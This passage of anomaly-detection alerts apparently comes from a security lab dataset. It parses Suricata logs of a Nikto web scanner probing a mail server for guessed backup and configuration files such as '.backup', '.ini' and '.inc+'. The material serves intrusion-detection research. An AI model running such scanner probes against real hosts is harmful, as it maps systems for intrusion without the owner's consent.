"/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.backup", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46816, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":733129426476444,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 733129426476444, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.205030+0000\",\"flow_id\":733129426476444,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": 
[ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.206813 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46818 -> 192.168.10.154:80", "/parser/model/time": 1583349514.206813, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46818, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.206813 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46818 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": 
"NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.xls", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.207040+0000\",\"flow_id\":2162825255068915,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.20704, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2162825255068915,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.xls\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.xls\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.xls", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.xls", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 
"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46818, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2162825255068915,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2162825255068915, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.207040+0000\",\"flow_id\":2162825255068915,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.208607 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46820 -> 192.168.10.154:80", "/parser/model/time": 1583349514.208607, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46820, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.208607 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by 
non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46820 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ini", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.208779+0000\",\"flow_id\":78486216256524,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.208779, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":78486216256524,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ini\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": 
",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ini\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ini", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ini", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46820, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":78486216256524,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 78486216256524, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.208779+0000\",\"flow_id\":78486216256524,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.210292 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46822 -> 192.168.10.154:80", "/parser/model/time": 1583349514.210292, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46822, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.210292 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46822 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.inc+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.210515+0000\",\"flow_id\":684282763424512,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.210515, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":684282763424512,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", 